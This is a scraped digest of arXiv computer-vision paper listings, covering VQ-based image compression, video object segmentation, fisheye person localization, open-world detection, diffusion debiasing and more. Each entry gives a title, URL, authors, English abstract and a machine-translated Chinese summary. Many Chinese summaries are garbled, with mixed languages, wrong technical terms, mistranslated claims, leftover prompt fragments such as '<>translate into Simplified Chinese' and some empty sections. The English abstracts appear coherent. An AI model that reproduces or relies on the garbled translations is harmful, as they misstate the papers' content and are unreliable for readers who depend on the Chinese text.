methods: 引入vector quantization（VQ）基于生成模型，将图像表示为VQ指标。
results: 提出了一种简单 yet有效的编码框架，可以在低比特率下保持图像重建质量。并通过对大规模代码库进行划分，实现图像可以被表示为多个不同的VQ指标，从而实现可变比特率和不同水平的重建质量。

Abstract
Recent advances in generative compression methods have demonstrated remarkable progress in enhancing the perceptual quality of compressed data, especially in scenarios with low bitrates. Nevertheless, their efficacy and applicability in achieving extreme compression ratios ($<0.1$ bpp) still remain constrained. In this work, we propose a simple yet effective coding framework by introducing vector quantization (VQ)-based generative models into the image compression domain. The main insight is that the codebook learned by the VQGAN model yields strong expressive capacity, facilitating efficient compression of continuous information in the latent space while maintaining reconstruction quality. Specifically, an image can be represented as VQ-indices by finding the nearest codeword, which can be encoded using lossless compression methods into bitstreams. We then propose clustering a pre-trained large-scale codebook into smaller codebooks using the K-means algorithm. This enables images to be represented as diverse ranges of VQ-indices maps, resulting in variable bitrates and different levels of reconstruction quality. Extensive qualitative and quantitative experiments on various datasets demonstrate that the proposed framework outperforms the state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.

摘要
The main idea is to use the codebook learned by the VQGAN model to efficiently compress continuous information in the latent space while maintaining reconstruction quality. Specifically, an image can be represented as VQ-indices by finding the nearest codeword, which can be encoded using lossless compression methods into bitstreams.To further improve the efficiency of the framework, we propose clustering a pre-trained large-scale codebook into smaller codebooks using the K-means algorithm. This enables images to be represented as diverse ranges of VQ-indices maps, resulting in variable bitrates and different levels of reconstruction quality.Extensive experiments on various datasets show that the proposed framework outperforms state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.

Hierarchical Spatiotemporal Transformers for Video Object Segmentation

paper_url: http://arxiv.org/abs/2307.08263
repo_url: None
paper_authors: Jun-Sang Yoo, Hongjae Lee, Seung-Won Jung
for: 这篇论文探讨了一个新的框架，即HST，用于半监督类别影像对象分割 (VOS)。
methods: 这篇论文使用了最新的Swin Transformer和Video Swin Transformer来提取影像和影片特征，并将它们视为问题和内存，以获得高效的对象掩模数据。
results: HST在处理具有遮盾和快速移动的物体，以及压缩背景的情况下表现出色，并在多个知名的测试benchmark上表现出比以前的竞争对手更高的效果。具体来说，HST-B在YouTube-VOS（85.0%）、DAVIS 2017（85.9%）和DAVIS 2016（94.0%）等多个知名测试benchmark上表现出比以前的竞争对手更高的效果。

Abstract
This paper presents a novel framework called HST for semi-supervised video object segmentation (VOS). HST extracts image and video features using the latest Swin Transformer and Video Swin Transformer to inherit their inductive bias for the spatiotemporal locality, which is essential for temporally coherent VOS. To take full advantage of the image and video features, HST casts image and video features as a query and memory, respectively. By applying efficient memory read operations at multiple scales, HST produces hierarchical features for the precise reconstruction of object masks. HST shows effectiveness and robustness in handling challenging scenarios with occluded and fast-moving objects under cluttered backgrounds. In particular, HST-B outperforms the state-of-the-art competitors on multiple popular benchmarks, i.e., YouTube-VOS (85.0%), DAVIS 2017 (85.9%), and DAVIS 2016 (94.0%).

摘要

Large-Scale Person Detection and Localization using Overhead Fisheye Cameras

paper_url: http://arxiv.org/abs/2307.08252
repo_url: None
paper_authors: Lu Yang, Liulei Li, Xueshi Xin, Yifan Sun, Qing Song, Wenguan Wang
for: 本研究旨在提供一种基于折射镜相机的人员位置测定方法，以满足现代生活中的各种应用需求。
methods: 该方法使用了一种基于折射镜的人体探测网络，利用折射镜的扭转对称性进行培训策略，并通过数值解决方法计算实际人员位置。
results: 实验结果表明， compared to先前方法，该方法的折射镜人体探测器有superiority，并且整个折射镜位置测定方法可以在0.5米的准确精度下，在0.1秒钟之内确定所有人员在FOV的位置。

Abstract
Location determination finds wide applications in daily life. Instead of existing efforts devoted to localizing tourist photos captured by perspective cameras, in this article, we focus on devising person positioning solutions using overhead fisheye cameras. Such solutions are advantageous in large field of view (FOV), low cost, anti-occlusion, and unaggressive work mode (without the necessity of cameras carried by persons). However, related studies are quite scarce, due to the paucity of data. To stimulate research in this exciting area, we present LOAF, the first large-scale overhead fisheye dataset for person detection and localization. LOAF is built with many essential features, e.g., i) the data cover abundant diversities in scenes, human pose, density, and location; ii) it contains currently the largest number of annotated pedestrian, i.e., 457K bounding boxes with groundtruth location information; iii) the body-boxes are labeled as radius-aligned so as to fully address the positioning challenge. To approach localization, we build a fisheye person detection network, which exploits the fisheye distortions by a rotation-equivariant training strategy and predict radius-aligned human boxes end-to-end. Then, the actual locations of the detected persons are calculated by a numerical solution on the fisheye model and camera altitude data. Extensive experiments on LOAF validate the superiority of our fisheye detector w.r.t. previous methods, and show that our whole fisheye positioning solution is able to locate all persons in FOV with an accuracy of 0.5 m, within 0.1 s.

摘要
Location determination has numerous applications in daily life. Instead of previous efforts focused on localizing tourist photos captured by perspective cameras, this article focuses on developing person positioning solutions using overhead fisheye cameras. These solutions have several advantages, including a large field of view (FOV), low cost, resistance to occlusion, and a non-intrusive work mode (without the need for cameras carried by individuals). However, there is a lack of related studies due to the scarcity of data. To promote research in this exciting area, we present LOAF, the first large-scale overhead fisheye dataset for person detection and localization. LOAF features several essential aspects, including:1. Diverse scenes, human poses, densities, and locations are covered in the data.2. It contains the largest number of annotated pedestrians, with 457,000 bounding boxes and ground truth location information.3. The body boxes are labeled as radius-aligned to fully address the positioning challenge.To perform localization, we develop a fisheye person detection network that leverages fisheye distortions using a rotation-equivariant training strategy. The network predicts radius-aligned human boxes end-to-end. Then, the actual locations of the detected persons are calculated using a numerical solution on the fisheye model and camera altitude data. Extensive experiments on LOAF demonstrate the superiority of our fisheye detector compared to previous methods, and show that our entire fisheye positioning solution can accurately locate all persons in the FOV within 0.5 meters and within 0.1 seconds.

Random Boxes Are Open-world Object Detectors

paper_url: http://arxiv.org/abs/2307.08249
repo_url: https://github.com/scuwyh2000/randbox
paper_authors: Yanghao Wang, Zhongqi Yue, Xian-Sheng Hua, Hanwang Zhang
for: 本文目的是提出一种基于随机区域提议的Open-world Object Detection（OWOD）方法，以提高不知对象的检测精度。
methods: 本文使用的方法包括Random Box（RandBox）架构，基于Faster R-CNN和Transformer的基础，通过随机提议来增强模型的泛化能力。
results: 对 Pascal-VOC/MS-COCO 和 LVIS 两个底层 benchmark 进行了评估， RandBox 在所有指标中显著超过了之前的状态方法。 codes 可以在 https://github.com/scuwyh2000/RandBox 上获取。

Abstract
We show that classifiers trained with random region proposals achieve state-of-the-art Open-world Object Detection (OWOD): they can not only maintain the accuracy of the known objects (w/ training labels), but also considerably improve the recall of unknown ones (w/o training labels). Specifically, we propose RandBox, a Fast R-CNN based architecture trained on random proposals at each training iteration, surpassing existing Faster R-CNN and Transformer based OWOD. Its effectiveness stems from the following two benefits introduced by randomness. First, as the randomization is independent of the distribution of the limited known objects, the random proposals become the instrumental variable that prevents the training from being confounded by the known objects. Second, the unbiased training encourages more proposal explorations by using our proposed matching score that does not penalize the random proposals whose prediction scores do not match the known objects. On two benchmarks: Pascal-VOC/MS-COCO and LVIS, RandBox significantly outperforms the previous state-of-the-art in all metrics. We also detail the ablations on randomization and loss designs. Codes are available at https://github.com/scuwyh2000/RandBox.

摘要

Randomization independence from the distribution of limited known objects: Random proposals serve as an instrumental variable that prevents training from being confounded by known objects.2. Unbiased training encourages proposal exploration: Our proposed matching score does not penalize random proposals with incorrect prediction scores, encouraging more exploration.On Pascal-VOC/MS-COCO and LVIS benchmarks, RandBox significantly outperforms previous state-of-the-art in all metrics. We also conduct ablation studies on randomization and loss designs. The codes are available at https://github.com/scuwyh2000/RandBox.

Uncertainty-aware State Space Transformer for Egocentric 3D Hand Trajectory Forecasting

paper_url: http://arxiv.org/abs/2307.08243
repo_url: None
paper_authors: Wentao Bao, Lele Chen, Libing Zeng, Zhong Li, Yi Xu, Junsong Yuan, Yu Kong
for: 预测人工手势 trajectory from egocentric views，以便快速理解人与AR/VR系统的互动意图。
methods: 提出了一种基于RGB视频在首人视角下的 egocentric 3D手势轨迹预测任务，使用了不确定性意识的状态空间变换器（USST），并可以通过速度约束和视觉提示调整（VPT）进一步改进。
results: 在H2O和EgoPAT3D数据集上实现了USST的超越性，并且可以对2D和3D轨迹预测进行比较。代码和数据集公开发布在GitHub上：https://github.com/Cogito2012/USST。

Abstract
Hand trajectory forecasting from egocentric views is crucial for enabling a prompt understanding of human intentions when interacting with AR/VR systems. However, existing methods handle this problem in a 2D image space which is inadequate for 3D real-world applications. In this paper, we set up an egocentric 3D hand trajectory forecasting task that aims to predict hand trajectories in a 3D space from early observed RGB videos in a first-person view. To fulfill this goal, we propose an uncertainty-aware state space Transformer (USST) that takes the merits of the attention mechanism and aleatoric uncertainty within the framework of the classical state-space model. The model can be further enhanced by the velocity constraint and visual prompt tuning (VPT) on large vision transformers. Moreover, we develop an annotation workflow to collect 3D hand trajectories with high quality. Experimental results on H2O and EgoPAT3D datasets demonstrate the superiority of USST for both 2D and 3D trajectory forecasting. The code and datasets are publicly released: https://github.com/Cogito2012/USST.

摘要
<>translate into Simplified Chinese人体轨迹预测从自центриック视角是虚拟现实/扩展现实系统中关键的一部分，以便快速理解人类意图。然而，现有方法在2D图像空间中处理这个问题，这不适用于3D实际应用。在这篇论文中，我们设置了一个 Egocentric 3D 手轨迹预测任务，旨在从早期观察到RGB视频的第一人称视角中预测手轨迹在3D空间。为实现这个目标，我们提议一种不确定性意识状态空间变换器（USST），它将注意力机制和不确定性因素内置在классиical状态空间模型中。此外，我们还提出了速度约束和视觉提示调整（VPT），以提高大规模视觉变换器的性能。此外，我们还开发了一种高质量3D手轨迹注释工作流程。实验结果表明，USST在H2O和EgoPAT3D数据集上对2D和3D轨迹预测均有superiority。代码和数据集公共发布：https://github.com/Cogito2012/USST。

Unified Open-Vocabulary Dense Visual Prediction

paper_url: http://arxiv.org/abs/2307.08238
repo_url: None
paper_authors: Hengcan Shi, Munawar Hayat, Jianfei Cai
for: 这篇论文旨在提出一种统一开 vocabulary 网络（UOVN），以jointly Address four 常见的dense prediction 任务。
methods: 该论文提出了一种多Modal, multi-scale和多任务（MMM）解码机制，以更好地利用多modal数据。此外，它还提出了一种UOVN 训练机制，以降低不同任务和领域之间的差距。
results: 实验结果表明，UOVN 可以有效地 Address four datasets 上的 dense prediction 任务。

Abstract
In recent years, open-vocabulary (OV) dense visual prediction (such as OV object detection, semantic, instance and panoptic segmentations) has attracted increasing research attention. However, most of existing approaches are task-specific and individually tackle each task. In this paper, we propose a Unified Open-Vocabulary Network (UOVN) to jointly address four common dense prediction tasks. Compared with separate models, a unified network is more desirable for diverse industrial applications. Moreover, OV dense prediction training data is relatively less. Separate networks can only leverage task-relevant training data, while a unified approach can integrate diverse training data to boost individual tasks. We address two major challenges in unified OV prediction. Firstly, unlike unified methods for fixed-set predictions, OV networks are usually trained with multi-modal data. Therefore, we propose a multi-modal, multi-scale and multi-task (MMM) decoding mechanism to better leverage multi-modal data. Secondly, because UOVN uses data from different tasks for training, there are significant domain and task gaps. We present a UOVN training mechanism to reduce such gaps. Experiments on four datasets demonstrate the effectiveness of our UOVN.

摘要
Recently, open-vocabulary (OV) dense visual prediction (such as OV object detection, semantic, instance and panoptic segmentations) has attracted increasing research attention. However, most existing approaches are task-specific and individually tackle each task. In this paper, we propose a Unified Open-Vocabulary Network (UOVN) to jointly address four common dense prediction tasks. Compared with separate models, a unified network is more desirable for diverse industrial applications. Moreover, OV dense prediction training data is relatively less. Separate networks can only leverage task-relevant training data, while a unified approach can integrate diverse training data to boost individual tasks. We address two major challenges in unified OV prediction. Firstly, unlike unified methods for fixed-set predictions, OV networks are usually trained with multi-modal data. Therefore, we propose a multi-modal, multi-scale and multi-task (MMM) decoding mechanism to better leverage multi-modal data. Secondly, because UOVN uses data from different tasks for training, there are significant domain and task gaps. We present a UOVN training mechanism to reduce such gaps. Experiments on four datasets demonstrate the effectiveness of our UOVN.Here's the word-for-word translation of the text into Simplified Chinese:近年来，开放词汇（OV）密集预测（如OV物体检测、 semantics、实例和杂alu segmentation）在研究中吸引了越来越多的注意力。然而，大多数现有的方法都是任务特定的，每个任务都是单独处理的。在这篇论文中，我们提出了一个统一开放词汇网络（UOVN），用于同时处理四种常见的密集预测任务。相比之下，分开的模型更加适合各种工业应用。此外，OV密集预测的训练数据相对较少。分开的网络只能利用任务相关的训练数据，而统一的方法可以更好地利用多种数据来提高个个任务。我们解决了两个主要挑战：一是与统一方法不同，OV网络通常在多模式数据上训练。因此，我们提出了一种多模式、多尺度和多任务（MMM）解码机制，以更好地利用多模式数据。二是由于UOVN在训练时使用不同任务的数据，存在域和任务漏报。我们提出了一种UOVN训练机制，以减少这些漏报。实验结果表明，我们的UOVN具有效果。

Video Frame Interpolation with Stereo Event and Intensity Camera

paper_url: http://arxiv.org/abs/2307.08228
repo_url: None
paper_authors: Chao Ding, Mingyuan Lin, Haijian Zhang, Jianzhuang Liu, Lei Yu
for: 解决实时视频 interpolate 中困难很多的 cross-modality parallax 问题，提高 Event-based Video Frame Interpolation (E-VFI) 的性能。
methods: 提出了一种 novel Stereo Event-based VFI (SE-VFI) 网络 (SEVFI-Net)，通过Feature Aggregation Module (FAM) 缓解 parallax，并通过综合了 optical flow 和 disparity estimation 来生成高质量的中间帧和相关的分辨率信息。
results: 对于实际世界的复杂动作和不同深度的场景，我们的提出的 SEVFI-Net 可以与现有的 E-VFI 方法相比，在多个公共实际三视图数据集（DSEC和MVSEC）和我们自己收集的 Stereo Event-Intensity Dataset (SEID) 上达到了显著的性能提升。

Abstract
The stereo event-intensity camera setup is widely applied to leverage the advantages of both event cameras with low latency and intensity cameras that capture accurate brightness and texture information. However, such a setup commonly encounters cross-modality parallax that is difficult to be eliminated solely with stereo rectification especially for real-world scenes with complex motions and varying depths, posing artifacts and distortion for existing Event-based Video Frame Interpolation (E-VFI) approaches. To tackle this problem, we propose a novel Stereo Event-based VFI (SE-VFI) network (SEVFI-Net) to generate high-quality intermediate frames and corresponding disparities from misaligned inputs consisting of two consecutive keyframes and event streams emitted between them. Specifically, we propose a Feature Aggregation Module (FAM) to alleviate the parallax and achieve spatial alignment in the feature domain. We then exploit the fused features accomplishing accurate optical flow and disparity estimation, and achieving better interpolated results through flow-based and synthesis-based ways. We also build a stereo visual acquisition system composed of an event camera and an RGB-D camera to collect a new Stereo Event-Intensity Dataset (SEID) containing diverse scenes with complex motions and varying depths. Experiments on public real-world stereo datasets, i.e., DSEC and MVSEC, and our SEID dataset demonstrate that our proposed SEVFI-Net outperforms state-of-the-art methods by a large margin.

摘要
这个双摄频码设置是广泛应用，以利用两种事件摄频的优点，即低延迟和精确的光度和 texture 信息。但是，这种设置通常会面临跨modalità 偏移，这是对单独使用摄频补偿所困难以解决，特别是 для 实际世界的场景中的复杂运动和不同的深度，导致现有的 Event-based Video Frame Interpolation (E-VFI) 方法中的缺陷和扭曲。为了解决这个问题，我们提出了一个新的双摄频基于 VFI (SE-VFI) 网络（SEVFI-Net），用于从不一致的两个关键帧和事件流中生成高品质的中频帧和相应的偏移。具体来说，我们提出了一个 Feature Aggregation Module (FAM)，以解决偏移和在特征领域进行空间Alignment。然后，我们利用融合的特征来完成精确的光流和偏移估测，并通过流动基于和synthesis基于的方法来取得更好的 interpolated 结果。我们还建立了一个双摄频视觉采集系统，该系统包括一个事件摄频和一个RGB-D 摄频，以收集一个新的双摄频 Intensity Dataset (SEID)，该dataset包括多样化的场景中的复杂运动和不同的深度。实验结果显示，我们的提案的 SEVFI-Net 在公共的实际世界双摄频dataset上（DSEC和MVSEC）和我们的 SEID dataset上都表现出色，与现有的方法相比，具有较大的改善空间。

Ada3D : Exploiting the Spatial Redundancy with Adaptive Inference for Efficient 3D Object Detection

paper_url: http://arxiv.org/abs/2307.08209
repo_url: None
paper_authors: Tianchen Zhao, Xuefei Ning, Ke Hong, Zhongyuan Qiu, Pu Lu, Yali Zhao, Linfeng Zhang, Lipu Zhou, Guohao Dai, Huazhong Yang, Yu Wang
for: 这个研究旨在提高自驾车中3D物体检测的效率，使其能够在资源有限的车辆上运行。
methods: 这个研究使用了适应推理框架，将输入中的空间重复点滤除，以提高模型的效率。此外，它还利用了2D BEV特征 map 的自然稀畴性，实现了缓存和computational cost的减少。
results: 这个研究获得了40%的缩减在3D voxels上，并将2D BEV特征 map 的密度从100%降低到20%，而无需对准确性作出牺牲。此外，这个方法可以降低模型的computational cost和缓存价值，并且实现了端到端 GPU 延迟和 GPU 峰值内存优化。

Abstract
Voxel-based methods have achieved state-of-the-art performance for 3D object detection in autonomous driving. However, their significant computational and memory costs pose a challenge for their application to resource-constrained vehicles. One reason for this high resource consumption is the presence of a large number of redundant background points in Lidar point clouds, resulting in spatial redundancy in both 3D voxel and dense BEV map representations. To address this issue, we propose an adaptive inference framework called Ada3D, which focuses on exploiting the input-level spatial redundancy. Ada3D adaptively filters the redundant input, guided by a lightweight importance predictor and the unique properties of the Lidar point cloud. Additionally, we utilize the BEV features' intrinsic sparsity by introducing the Sparsity Preserving Batch Normalization. With Ada3D, we achieve 40% reduction for 3D voxels and decrease the density of 2D BEV feature maps from 100% to 20% without sacrificing accuracy. Ada3D reduces the model computational and memory cost by 5x, and achieves 1.52x/1.45x end-to-end GPU latency and 1.5x/4.5x GPU peak memory optimization for the 3D and 2D backbone respectively.

摘要
voxel-based方法已经实现了自动驾驶场景中3D对象检测的状态机器。但是，它们的计算和内存成本却成为应用于有限资源的车辆中的挑战。一个原因是Lidar点云中的背景点的大量重复，导致3D voxel和稠密的BEV地图表示中的空间重复。为解决这个问题，我们提议了一种适应性推理框架，称之为Ada3D。Ada3D通过在输入水平进行适应性滤波，以避免不必要的计算。此外，我们利用BEV特征的自然稀畴性，通过引入稀畴保持批处理normalization。与Ada3D相比，我们实现了3D voxels的40%减少和2D BEV特征地图的density从100%降至20%，无需牺牲准确性。Ada3D降低了模型的计算和内存成本，并实现了3D和2D核心的5x缩放和1.5x/4.5x GPU峰值内存优化。

Unbiased Image Synthesis via Manifold-Driven Sampling in Diffusion Models

paper_url: http://arxiv.org/abs/2307.08199
repo_url: None
paper_authors: Xingzhe Su, Yi Ren, Wenwen Qiang, Zeen Song, Hang Gao, Fengge Wu, Changwen Zheng
for: 这个研究旨在Addressing data bias in diffusion models, especially when the training data does not accurately represent the true data distribution and exhibits skewed or imbalanced patterns.methods: 我们提出了一种新的方法，即利用构造指导来减少Diffusion models中的数据偏见。我们的关键思想是使用无supervised方法估计训练数据的构造，然后使其导引Diffusion models中的抽样过程。这样可以使生成的图像在数据构造上具备均匀分布，不需要更改模型架构或重新训练。results: 我们的理论分析和实验证明，该方法可以对Diffusion models进行改善图像生成质量和不偏性。 Specifically, our method can generate more diverse and balanced images compared to standard diffusion models, and can also improve the robustness of downstream applications.

Abstract
Diffusion models are a potent class of generative models capable of producing high-quality images. However, they can face challenges related to data bias, favoring specific modes of data, especially when the training data does not accurately represent the true data distribution and exhibits skewed or imbalanced patterns. For instance, the CelebA dataset contains more female images than male images, leading to biased generation results and impacting downstream applications. To address this issue, we propose a novel method that leverages manifold guidance to mitigate data bias in diffusion models. Our key idea is to estimate the manifold of the training data using an unsupervised approach, and then use it to guide the sampling process of diffusion models. This encourages the generated images to be uniformly distributed on the data manifold without altering the model architecture or necessitating labels or retraining. Theoretical analysis and empirical evidence demonstrate the effectiveness of our method in improving the quality and unbiasedness of image generation compared to standard diffusion models.

摘要
文本翻译成简化中文：Diffusion模型是一种强大的生成模型，能够生成高质量图像。然而，它们可能面临数据偏袋问题，尤其当训练数据不准确反映真实数据分布，并且呈现偏斜或不均匀的模式时。例如，CelebA数据集中有更多的女性图像 than male images，这会导致生成结果偏斜，并影响下游应用。为解决这个问题，我们提出了一种新的方法，利用拓扑导航来减轻 diffusion models 中的数据偏袋。我们的关键思想是通过不supervised的方式来估计训练数据的拓扑 manifold，然后使用它来导引 diffusion models 中的采样过程。这会使生成的图像在数据拓扑上均匀分布，而不需要修改模型结构或者需要标签或重新训练。我们的理论分析和实验证据表明，我们的方法可以提高图像生成的质量和不偏袋性，相比标准的 diffusion models。

On Point Affiliation in Feature Upsampling

paper_url: http://arxiv.org/abs/2307.08198
repo_url: https://github.com/tiny-smart/sapa
paper_authors: Wenze Liu, Hao Lu, Yuliang Liu, Zhiguo Cao
For: + The paper is written for improving feature upsampling in dense prediction tasks, specifically addressing the problem of point affiliation.* Methods: + The paper introduces the notion of point affiliation and presents a novel, lightweight, and universal upsampling solution called Similarity-Aware Point Affiliation (SAPA). + SAPA uses a generic formulation for generating similarity-aware upsampling kernels, which encourage not only semantic smoothness but also boundary sharpness.* Results: + The paper shows that SAPA outperforms prior upsamplers and consistently improves performance on a number of dense prediction tasks, including semantic segmentation, object detection, instance segmentation, panoptic segmentation, image matting, and depth estimation.

Abstract
We introduce the notion of point affiliation into feature upsampling. By abstracting a feature map into non-overlapped semantic clusters formed by points of identical semantic meaning, feature upsampling can be viewed as point affiliation -- designating a semantic cluster for each upsampled point. In the framework of kernel-based dynamic upsampling, we show that an upsampled point can resort to its low-res decoder neighbors and high-res encoder point to reason the affiliation, conditioned on the mutual similarity between them. We therefore present a generic formulation for generating similarity-aware upsampling kernels and prove that such kernels encourage not only semantic smoothness but also boundary sharpness. This formulation constitutes a novel, lightweight, and universal upsampling solution, Similarity-Aware Point Affiliation (SAPA). We show its working mechanism via our preliminary designs with window-shape kernel. After probing the limitations of the designs on object detection, we reveal additional insights for upsampling, leading to SAPA with the dynamic kernel shape. Extensive experiments demonstrate that SAPA outperforms prior upsamplers and invites consistent performance improvements on a number of dense prediction tasks, including semantic segmentation, object detection, instance segmentation, panoptic segmentation, image matting, and depth estimation. Code is made available at: https://github.com/tiny-smart/sapa

摘要
我们引入点聚合（point affiliation）into feature upsampling。我们抽象特征图into non-overlapped semantic clusters formed by points of identical semantic meaning，可以视为点聚合——为每个upsampled点分配一个semantic cluster。在基于kernel的动态upsampling框架中，我们表明upsampled点可以借助其low-res decoder neighbors和高-res encoder point来理解聚合，conditioned on它们之间的相似性。我们因此提出了一种通用的形式化方法，生成相似度感知upsampling kernel，并证明这些kernel不仅激发semantic smoothness，还激发boundary sharpness。这种形式化方法被称为Similarity-Aware Point Affiliation（SAPA）。我们通过我们的初步设计中的窗口形状kernel来示出它的工作机制。在对对象检测 task进行评估后，我们揭示了更多的增强方法，导致SAPA with dynamic kernel shape。广泛的实验表明SAPA比前一代的upsamplers有更好的性能，并在多个 dense prediction task 上具有一致的表现提升，包括semantic segmentation、object detection、instance segmentation、panoptic segmentation、image matting和depth estimation。代码可以在https://github.com/tiny-smart/sapa上获取。

Zero-Shot Image Harmonization with Generative Model Prior

paper_url: http://arxiv.org/abs/2307.08182
repo_url: https://github.com/windvchen/diff-harmonization
paper_authors: Jianqi Chen, Zhengxia Zou, Yilan Zhang, Keyan Chen, Zhenwei Shi
for: 本文旨在提出一种零shot图像协调方法，不需要大量的合成图像训练。
methods: 我们 Draw lessons from human behavior，使用预训练的生成模型来模拟人类对协调图像的偏好。我们还提出了一种Attention-Constraint Text来引导协调方向。
results: 我们的方法可以具有高效性和一致性，并且可以保持前景内容结构。广泛的实验证明了我们的方法的有效性，并且我们还探索了一些有趣的应用场景。

Abstract
Recent image harmonization methods have demonstrated promising results. However, due to their heavy reliance on a large number of composite images, these works are expensive in the training phase and often fail to generalize to unseen images. In this paper, we draw lessons from human behavior and come up with a zero-shot image harmonization method. Specifically, in the harmonization process, a human mainly utilizes his long-term prior on harmonious images and makes a composite image close to that prior. To imitate that, we resort to pretrained generative models for the prior of natural images. For the guidance of the harmonization direction, we propose an Attention-Constraint Text which is optimized to well illustrate the image environments. Some further designs are introduced for preserving the foreground content structure. The resulting framework, highly consistent with human behavior, can achieve harmonious results without burdensome training. Extensive experiments have demonstrated the effectiveness of our approach, and we have also explored some interesting applications.

摘要
Simplified Chinese:最近的图像协调方法已经展示出了有前途的结果，但它们往往因依赖大量的组合图像而成本高于训练阶段，而且常常无法泛化到未看过的图像。在这篇论文中，我们听从人类行为，提出了一种零shot图像协调方法。具体来说，在协调过程中，人类主要利用了长期的偏好 towards Harmonious images，使得组合图像更接近于这种偏好。为了模仿这种情况，我们采用了预训练的生成模型来定义自然图像的先验。为了指导协调方向，我们提出了一种注意力约束文本，该文本在图像环境中得到了优化。此外，我们还引入了一些保持前景内容结构的further designs。得到的框架与人类行为高度一致，可以无需压力的训练实现和谐的结果。我们进行了广泛的实验，并explored了一些有趣的应用。

Boundary-weighted logit consistency improves calibration of segmentation networks

paper_url: http://arxiv.org/abs/2307.08163
repo_url: None
paper_authors: Neerav Karani, Neel Dey, Polina Golland
for: 这个论文是为了解决神经网络预测概率和准确率之间的强相关性问题，以及图像分割数据中的固有标签抽象问题。
methods: 该论文使用了随机变换的稳定性来防止过于自信的预测，并提出了边界权重扩展来提供最佳的准确性调整。
results: 该论文对抑制癌细胞和心脏MRI分割问题取得了state-of-the-art的准确性。

Abstract
Neural network prediction probabilities and accuracy are often only weakly-correlated. Inherent label ambiguity in training data for image segmentation aggravates such miscalibration. We show that logit consistency across stochastic transformations acts as a spatially varying regularizer that prevents overconfident predictions at pixels with ambiguous labels. Our boundary-weighted extension of this regularizer provides state-of-the-art calibration for prostate and heart MRI segmentation.

摘要
神经网络预测概率和准确率通常只有weakly相关。在图像分割训练数据中的自然标签抽象使得这种误差更加严重。我们表明，在Stochastic变换中的Logit一致性作为空间分布的variational regularizer，可以防止在杂 Label pixels上的过于自信。我们的边界权重扩展可以提供state-of-the-art的均衡。Note: "Simplified Chinese" refers to the written form of Chinese that uses simplified characters and grammar, which is commonly used in mainland China.

Self-Attention Based Generative Adversarial Networks For Unsupervised Video Summarization

paper_url: http://arxiv.org/abs/2307.08145
repo_url: None
paper_authors: Maria Nektaria Minaidi, Charilaos Papaioannou, Alexandros Potamianos
for: 这 paper 的目的是提出一种基于无监督学习的视频摘要生成方法，使其能够生成具有代表性的摘要，与原始视频无法区分。
methods: 该方法基于一个流行的 Generative Adversarial Network (GAN) 的建立，通过在选择、编码和解码视频帧中引入注意力机制，以模型视频之间的时间关系。提出了 SUM-GAN-AED 模型，combines self-attention mechanism for frame selection with LSTMs for encoding and decoding.
results: 对 SumMe、TVSum 和 COGNIMUSE 等数据集进行了实验，结果表明，使用自注意机制作为帧选择机制，在 SumMe 上表现出色，与其他状态态的比较对 TVSum 和 COGNIMUSE 的表现相对较好。

Abstract
In this paper, we study the problem of producing a comprehensive video summary following an unsupervised approach that relies on adversarial learning. We build on a popular method where a Generative Adversarial Network (GAN) is trained to create representative summaries, indistinguishable from the originals. The introduction of the attention mechanism into the architecture for the selection, encoding and decoding of video frames, shows the efficacy of self-attention and transformer in modeling temporal relationships for video summarization. We propose the SUM-GAN-AED model that uses a self-attention mechanism for frame selection, combined with LSTMs for encoding and decoding. We evaluate the performance of the SUM-GAN-AED model on the SumMe, TVSum and COGNIMUSE datasets. Experimental results indicate that using a self-attention mechanism as the frame selection mechanism outperforms the state-of-the-art on SumMe and leads to comparable to state-of-the-art performance on TVSum and COGNIMUSE.

摘要
在这篇论文中，我们研究了一种不需要监督的视频概要生成方法，基于对抗学习。我们建立在一种受欢迎的方法之上，其中一个生成概要网络（GAN）在创造可信任的概要时进行训练。我们通过将注意力机制引入网络架构中，选择、编码和解码视频帧时，以表明自我注意力和变换器在视频概要模型中的有效性。我们提出了SUM-GAN-AED模型，它使用自我注意力机制来选择帧，并使用LSTM来编码和解码。我们在SumMe、TVSum和COGNIMUSE数据集上评估SUM-GAN-AED模型的性能。实验结果表明，使用自我注意力机制来选择帧比预先的状态对SUMMe数据集表现更好，并且在TVSum和COGNIMUSE数据集上表现相当于预先的状态。

Neural Stream Functions

paper_url: http://arxiv.org/abs/2307.08142
repo_url: https://github.com/skywolf829/neuralstreamfunction
paper_authors: Skylar Wolfgang Wurster, Hanqi Guo, Tom Peterka, Han-Wei Shen
for: 这个论文是为了计算流函数的，流函数是一个scalar函数，其梯度与给定的vector field垂直。
methods: 这个论文使用神经网络方法来学习流函数，输入是vector field，神经网络会学习将输入坐标映射到流函数值上。
results: 这个论文的结果表明，使用神经网络方法可以高效地计算流函数，并且可以根据输入vector field的不同来生成不同的流函数解。此外，论文还提出了一些可选的约束来生成流函数解，以便在流场的拟合中提高计算的精度。

Abstract
We present a neural network approach to compute stream functions, which are scalar functions with gradients orthogonal to a given vector field. As a result, isosurfaces of the stream function extract stream surfaces, which can be visualized to analyze flow features. Our approach takes a vector field as input and trains an implicit neural representation to learn a stream function for that vector field. The network learns to map input coordinates to a stream function value by minimizing the inner product of the gradient of the neural network's output and the vector field. Since stream function solutions may not be unique, we give optional constraints for the network to learn particular stream functions of interest. Specifically, we introduce regularizing loss functions that can optionally be used to generate stream function solutions whose stream surfaces follow the flow field's curvature, or that can learn a stream function that includes a stream surface passing through a seeding rake. We also discuss considerations for properly visualizing the trained implicit network and extracting artifact-free surfaces. We compare our results with other implicit solutions and present qualitative and quantitative results for several synthetic and simulated vector fields.

摘要
我们提出了一种神经网络方法来计算流函数，它是一个Scalar函数的梯度垂直于给定的vector field。因此，isoSurface流函数EXTRACT流面，可以用来分析流体特性。我们的方法通过将vector field作为输入，训练一个隐式神经表示来学习一个流函数 для该vector field。神经网络学习将输入坐标映射到流函数值上，通过内积 Inner product的梯度和vector field的梯度来最小化。由于流函数解可能不唯一，我们可以选择性地添加约束来学习特定的流函数解。例如，我们可以添加一个正则化损失函数，使流函数解的流面与流体场的弯曲度相符，或者学习一个流函数解包含一个流面通过种子排 sowing rake。我们还讨论了可视化训练后的隐式网络和EXTRACT artifact-free 流面的注意事项。我们与其他隐式解相比较，并对一些Synthetic和Simulated vector field进行了质量和量化的比较结果。

Adaptively Placed Multi-Grid Scene Representation Networks for Large-Scale Data Visualization

paper_url: http://arxiv.org/abs/2308.02494
repo_url: https://github.com/skywolf829/apmgsrn
